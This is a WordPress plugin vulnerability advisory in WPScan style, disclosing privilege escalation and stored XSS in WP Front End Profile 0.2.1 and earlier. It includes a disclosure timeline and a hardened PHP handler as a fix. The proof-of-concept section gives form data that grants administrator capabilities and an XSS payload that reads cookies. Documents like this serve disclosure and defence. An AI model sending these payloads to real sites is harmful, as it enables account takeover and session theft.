WP Front End Profile <= 0.2.1 - Privilege Escalation & Stored Cross-Site Scripting (XSS)


Description
It is possible to modify a POST request to overwrite arbitrary user meta, including 'wp_capabilities' and 'wp_user_level', which results in a privilege escalation vulnerability.

User input is not sanitised, nor escaped on output, resulting in a stored XSS vulnerability.

Timeline:

2016-09-12: Vulnerability found
2016-09-12: Reported to vendor
2016-09-12: Vendor responded
2016-09-14: Vendor released a fixed version (0.2.2)
2016-09-14: Public disclosure

Proof of Concept
Privilege Escalation - Form data

profile[user_email]:subscriber@example.com
profile[wp_capabilities][administrator]:1
profile[wp_user_level]:10
profile[user_url]:
profile[description]:
profile[wpfep_save]:Update Profile
wpfep_nonce_name:99fc626e77
_wp_http_referer:/sample-page/

Stored XSS - Form data

wpmark_tab[testing_field]:example"><script>alert(document.cookie)</script>
wpmark_tab[wpfep_save]:Update Testing
wpfep_nonce_name:02c01469d8
_wp_http_referer:/sample-page/
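Both proof-of-concept requests above exploit the same two defects: the profile handler writes whatever keys arrive under `profile[...]` straight into user meta, and stored values are echoed back without escaping. The following PHP is an added illustrative hardened handler, not the wp-front-end-profile plugin's code and not the contents of the linked changeset; the `wpfep_example_` function names, the nonce action `wpfep_save_profile`, and the field-to-sanitizer mapping are assumptions made for the example.

```php
<?php
// Illustrative hardened profile-update handler for a WordPress front-end
// profile form. This is an added example, NOT the wp-front-end-profile
// plugin's own code. Field names (profile[...], wpfep_nonce_name) follow the
// advisory's form data; everything else is an assumption for illustration.

// Only these profile[...] keys may be written, each through its own sanitizer.
// Anything not listed (including wp_capabilities and wp_user_level) is dropped.
function wpfep_example_allowed_fields() {
    return array(
        'user_email'  => 'sanitize_email',
        'user_url'    => 'esc_url_raw',
        'description' => 'sanitize_text_field',
    );
}

// Meta keys that must never be writable from a front-end form, whatever the
// allow-list says. The table prefix is looked up rather than assumed to be 'wp_'.
function wpfep_example_protected_keys() {
    global $wpdb;
    return array(
        $wpdb->prefix . 'capabilities',
        $wpdb->prefix . 'user_level',
        'wp_capabilities',
        'wp_user_level',
    );
}

function wpfep_example_handle_profile_update() {
    if ( ! isset( $_POST['profile']['wpfep_save'] ) ) {
        return;
    }
    // Nonce action name 'wpfep_save_profile' is assumed for this example.
    if ( ! isset( $_POST['wpfep_nonce_name'] )
        || ! wp_verify_nonce( $_POST['wpfep_nonce_name'], 'wpfep_save_profile' ) ) {
        wp_die( 'Invalid request.' );
    }
    // The submitter may only edit their own profile.
    $user_id = get_current_user_id();
    if ( ! $user_id || ! current_user_can( 'edit_user', $user_id ) ) {
        wp_die( 'Not allowed.' );
    }

    $submitted = wp_unslash( (array) $_POST['profile'] );
    $allowed   = wpfep_example_allowed_fields();
    $protected = wpfep_example_protected_keys();
    $clean     = array();

    foreach ( $submitted as $key => $value ) {
        // Drop protected keys outright, then anything not explicitly allow-listed.
        // This is what stops profile[wp_capabilities][administrator]=1 and
        // profile[wp_user_level]=10 from ever reaching update_user_meta().
        if ( in_array( $key, $protected, true ) || ! isset( $allowed[ $key ] ) ) {
            continue;
        }
        $raw           = is_scalar( $value ) ? (string) $value : '';
        $clean[ $key ] = call_user_func( $allowed[ $key ], $raw );
    }

    // Core user-table columns go through wp_update_user(); the rest is user meta.
    $user_update = array( 'ID' => $user_id );
    foreach ( array( 'user_email', 'user_url' ) as $field ) {
        if ( isset( $clean[ $field ] ) ) {
            $user_update[ $field ] = $clean[ $field ];
            unset( $clean[ $field ] );
        }
    }
    if ( count( $user_update ) > 1 ) {
        wp_update_user( $user_update );
    }
    foreach ( $clean as $key => $value ) {
        update_user_meta( $user_id, $key, $value );
    }
}
add_action( 'init', 'wpfep_example_handle_profile_update' );

// Output side: escape at the point of rendering so a stored value can never
// break out of the attribute. esc_attr() neutralises the '">' sequence used in
// the stored-XSS proof of concept above.
function wpfep_example_render_field( $user_id, $key ) {
    $value = get_user_meta( $user_id, $key, true );
    return '<input type="text" name="profile[' . esc_attr( $key ) . ']" value="'
        . esc_attr( $value ) . '">';
}
```

The allow-list is the control that matters for the privilege escalation: a deny-list of `wp_capabilities` and `wp_user_level` alone would still let a request write any other meta key the site relies on, and the prefix-based keys differ on installs that do not use `wp_`. Input sanitisation is defence in depth; it is the `esc_attr()` on output that closes the stored XSS, since the same value could be rendered in other contexts (for example `esc_html()` in page body text) with a different escaper each time.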

Affects

Plugin wp-front-end-profile
fixed in version 0.2.2

References

URL https://plugins.trac.wordpress.org/changeset/1495896/wp-front-end-profile

Classification

Type MULTI

Miscellaneous

Submitter Phil Wylie
Submitter Website https://www.philwylie.co.uk/
Submitter Twitter mustardbees
Views 158
Verified No
WPVDB ID 8620

Timeline

Publicly Published 2016-09-14 (3 months ago)
Added 2016-09-15 (3 months ago)
Last Updated 2016-09-15 (3 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site are Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.